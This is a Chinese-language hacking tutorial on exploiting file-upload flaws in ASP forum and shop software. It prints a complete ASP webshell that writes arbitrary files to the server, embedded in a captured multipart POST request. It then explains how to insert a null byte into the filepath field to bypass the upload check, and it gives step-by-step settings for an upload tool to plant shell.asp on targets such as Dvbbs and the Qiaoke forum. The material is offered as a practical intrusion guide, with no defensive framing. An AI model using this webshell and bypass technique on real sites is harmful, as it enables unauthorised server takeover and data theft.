網絡上許多程序都有著上傳漏洞，比如任我飛揚整站程序、動感購物商城、秋葉商城、惠信新聞系統等。本文主要講解上傳漏洞的入侵實戰以及一些擴展利用。首先我們要獲得客戶端和服務器之間傳遞的數據，事先準備好一個ASP木馬準備上傳，當然不可能成功，我們要的就是這中間我們向服務器提交的數據。一般用WsockExpert來獲得數據，由于數據太多只能把關鍵部分發出來如下：

　　POST /bbs/upfile.asp HTTP/1.1

　　……. 省略了N多沒用信息

Content-Length: 1792
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQTDTATD=NLDNNHPDJEEHOFNFBAGPOJKN
-----------------------------7d52191850242
Content-Disposition: form-data; name="filepath"

uploadFace
-----------------------------7d52191850242
Content-Disposition: form-data; name="act"

upload
-----------------------------7d52191850242
Content-Disposition: form-data; name="file1"; filename="E:\木馬\asp\shell.asp"
Content-Type: text/plain

＜% dim objFSO %＞
＜% dim fdata %＞
＜% dim objCountFile %＞
＜% on error resume next %＞
＜% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %＞
＜% if Trim(request("syfdpath"))＜＞"" then %＞
＜% fdata = request("cyfddata") %＞
＜% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %＞
＜% objCountFile.Write fdata %＞
＜% if err =0 then %＞
＜% response.write "＜font color=red＞＜h2＞成功!＜/h2＞＜font＞" %＞
＜% else %＞
＜% response.write "＜font color=red＞＜h1＞失敗！＜/h1＞＜/font＞" %＞
＜% end if %＞
＜% err.clear %＞
＜% end if %＞
＜% objCountFile.Close %＞
＜% Set objCountFile=Nothing %＞
＜% Set objFSO = Nothing %＞
＜% Response.write "＜form action='''' method=post＞" %＞
＜% Response.write "保存留言＜font color=red＞如D:\web\x.asp＜/font＞" %＞
＜% Response.Write "＜input type=text name=syfdpath width=32 size=50＞" %＞
＜% Response.Write "＜br＞" %＞
＜% Response.write "地址來自" %＞
＜% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %＞
＜% Response.write "＜br＞" %＞
＜% Response.write "你的留言:" %＞
＜% Response.write "＜textarea name=cyfddata cols=80 rows=10 width=32＞＜/textarea＞" %＞
＜% Response.write "＜input type=submit value=sky!!＞" %＞
＜% Response.write "＜/form＞" %＞

-----------------------------7d52191850242
Content-Disposition: form-data; name="fname"

E:\木馬\asp\shell.asp
-----------------------------7d52191850242
Content-Disposition: form-data; name="Submit"

上傳
-----------------------------7d52191850242--

　　傳遞的信息我們獲取了，下面就來修改下達到欺騙目的。主要修改一下幾點：

　　1.Content-Disposition: form-data; name="file1"; filename="E:\木馬\asp\shell.asp"

　　2.Content-Disposition: form-data; name="fname"

　　E:\木馬\asp\shell.asp

　　3.最重要的地方是Content-Disposition: form-data; name="filepath"下面的值要修改下。我們修改成uploadFace\shell.asp后面怎么加一個空字符呢?用UltraEdit是個好方法,用16進制編輯,(因為''\0''這個字符也占一個位置,所以我們先打入一空格,然后再在UltraEdit(用Ctrl+H轉換到16進制模式下)里將就空格符的20改成00)。

　　4.還有一個地方也要修改，就是這句Content-Length: 1792表示提交數據的字符個數。

　　如果你修改了filepath的值那么這個長度1792也要變換，一個字母或者數字的長度就是1，不要忘記最后面那個空格那個也算１。

　　【上傳漏洞實戰】 

　　我們就先用漏洞的鼻祖動網論壇來實戰下。從原理可以看到上傳的時侯還要修改數據，還要截包，所以網上出現了許多的工具。現在我們直接用老兵的上傳工具來把復雜的步驟變簡單，只要修改幾個數據就可以。我們來看下這個工具的界面，如下圖1：

圖1 老兵上傳工具界面

　　我們來說下工具的用法：

　　Action中輸入存在上傳漏洞文件的URL： http://target.net/bbs/UpFile.asp；UpPath里第一個文本框中的FilePath即為表單中的FilePath，也就是上傳路徑，等號后面填的是上傳到對方服務器上的后門的名稱/shell.asp；輸入一個WEB程序允許上傳的類型文本框中默認JPG就可以了（一般網站都允許上傳JPG圖片文件）；File里第一個文本框中的File1即是表單中的File1，等號后面填寫所要在本機上傳的木馬路徑；Cookies中填上我們用抓取數據包工具如WsockExpert抓取的Cookies值，記住最好是你在系統中注冊后的Cookies值。

　　這里以我們入侵動網論壇為例，這里Action：填入http://www.***.com/bbs/upfile.asp；UpPath第一個文本框填入：filepath；第二個填入：/shell.asp(你也可以寫/bbs/shell.asp這樣上傳成功后就傳到/bbs 目錄下了！)輸入一個WEB程序允許上傳的類型文本框中默認JPG就好了；File第一個文本框輸入：file1；第二個填入：E:\木馬\asp\shell.asp (這個ASP木馬是在自己機器上的路徑，點后面的文件打開圖標瀏覽找到ASP木馬即可。)

　　Cookies:這里不用抓包了，因為這里的上傳根本不檢測Cookie的哦。沒有它會報錯的如果都填寫好了直接按“Submit”按鍵提交！

圖2上傳成功提示

　　當點擊Submit按鈕后，最好用瀏覽器自己訪問下，程序也會有誤報的。我們用瀏覽器來訪問下。

圖3可以看到已經上傳成功了

　　下一步就是寫入一個功能強大的木馬來操作了，不再深入。

　　【上傳漏洞實戰擴展】 

　　并不僅僅只有動網有上傳漏洞，在網絡上許許多多的程序都有這個漏洞，上傳漏洞的原理一樣，掌握之后即可自由發揮，具體視程序代碼而定。下面我們以喬客論壇為例為大家擴展一下上傳漏洞的應用。
首先注冊一個正常用戶并且登錄，然后找到上傳頁面地址：http://192.168.1.3/3/upload.asp?uppath=forumupname=uptext=jk_word查看源碼如下：
--------------------------------------------------------------------------------

＜FORM name=form1 action=?action=upfile method=post encType=multipart/form-data＞
＜INPUT type=hidden value=forum name=up_path＞
＜INPUT type=hidden value=200593075710 name=up_name＞
＜INPUT type=hidden value=jk_word name=up_text＞ 
＜INPUT type=file size=40 name=file_name1＞
＜INPUT type=submit value=點擊上傳 name=submit＞

--------------------------------------------------------------------------------

　　看到源代碼后，就應該知道老兵上傳工具里邊我們該怎么填寫了。
Action中輸入：http://192.168.1.3/3/upload.asp?action=upfile UpPath第一個文本框中輸入：up_name；第二個中輸入上傳后的SHELL名稱shell.asp；File 第一個文本框中輸入file_name1,第二個是本機的木馬文件。COOKIES這里填寫抓包得到的COOKIES值，注意一定要填寫用WsockExpert抓取的Cookies信息，其主要功能是用來驗證！如圖：

圖4設置如圖

　　都設置好后點擊Submit按鈕，看到上傳成功了，打開瀏覽器訪問一下看是否成功，如圖

圖5上傳成功

　　至此已經成功的拿到webshell，就是這么簡單，重要的是我們的思路要靈活，也要善于發現一個系統是否存在上傳漏洞。當然至于拿到webshell后你能做什么，就看服務器的安全配置以及你的個人水平了哦，這里不做討論。